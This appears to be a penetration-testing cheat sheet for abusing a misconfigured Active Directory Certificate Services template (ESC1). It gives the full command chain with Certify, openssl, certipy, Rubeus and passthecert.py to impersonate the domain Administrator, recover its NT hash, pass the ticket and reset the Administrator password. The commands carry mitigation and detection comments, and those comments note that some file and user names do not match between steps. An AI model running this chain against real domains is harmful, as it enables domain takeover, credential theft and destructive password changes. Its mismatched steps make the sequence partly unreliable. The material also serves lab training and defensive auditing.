ADCS exploitation

# Enumerate certificate templates that Certify flags as misconfigured.
# The same check is useful as a defensive audit of your own CA: every template
# it reports should be reviewed and fixed or unpublished.
certify.exe find /vulnerable

# Request a certificate from the flagged template while naming a different
# account in the subject alternative name (/altname). The CA only honours this
# when the template lets the enrollee supply the subject and allows client
# authentication (the misconfiguration usually labelled ESC1).
# Mitigation: clear "Supply in the request" on the template, require CA manager
# approval, and restrict who may enroll.
# Detection: with CA auditing enabled, events 4886/4887 (request received /
# certificate issued) where the requested SAN does not match the requester.
.\certify.exe request /ca:dc.DOMAIN.htb\CERT-DC-CA /template:UserAuthentication /altname:administrator

# Convert the PEM file (certificate plus private key) into a PKCS#12 .pfx.
# cert.pem is presumably the PEM text saved from the request step above.
# openssl prompts for an export password; the resulting .pfx contains the
# private key and must be handled as a credential.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Sync the local clock with the domain: Kerberos rejects requests when the
# clock skew exceeds the allowed tolerance (5 minutes by default).
# Note that this changes the system time of the machine it is run on.
ntpdate domain.htb

# Authenticate to the DC with the certificate (Kerberos PKINIT). certipy
# obtains a TGT for the account named in the certificate and recovers that
# account's NT hash from the response.
# Detection: event 4768 on the DC with the certificate fields populated,
# especially for a privileged account authenticating from an unusual host.
certipy auth -pfx cert.pfx -dc-ip 10.10.11.2 -username Administrator -domain domain.htb

# Windows-side alternative: request a TGT with the certificate and load it
# into the current logon session (/ptt). /password is the .pfx export password.
# Passing it on the command line exposes it to process-creation logging
# (event 4688 with command-line auditing, Sysmon event 1).
# NOTE(review): /user and the .pfx name differ from the earlier steps; they
# look like values carried over from a different example.
Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt

# Split the .pfx into separate files: -nokey writes only the certificate,
# -nocert writes only the private key. user.key is key material and should be
# protected and removed when no longer needed.
certipy cert -pfx localadmin.pfx -nokey -out user.crt
certipy cert -pfx localadmin.pfx -nocert -out user.key

# PassTheCert: authenticate to LDAP over TLS with the certificate and key,
# then reset the target account's password.
# This is a destructive change: the account's real password is overwritten,
# which breaks anything that depends on it, and the reset is logged on the DC
# as event 4724 (password reset attempt).
# NOTE(review): admin.crt / admin.key do not match the user.crt / user.key
# file names produced by the previous step.
passthecert.py -action modify_user -target administrator -new-pass whoami123 -crt admin.crt -key admin.key -dc-ip 10.129.9.171  -domain domain.htb 
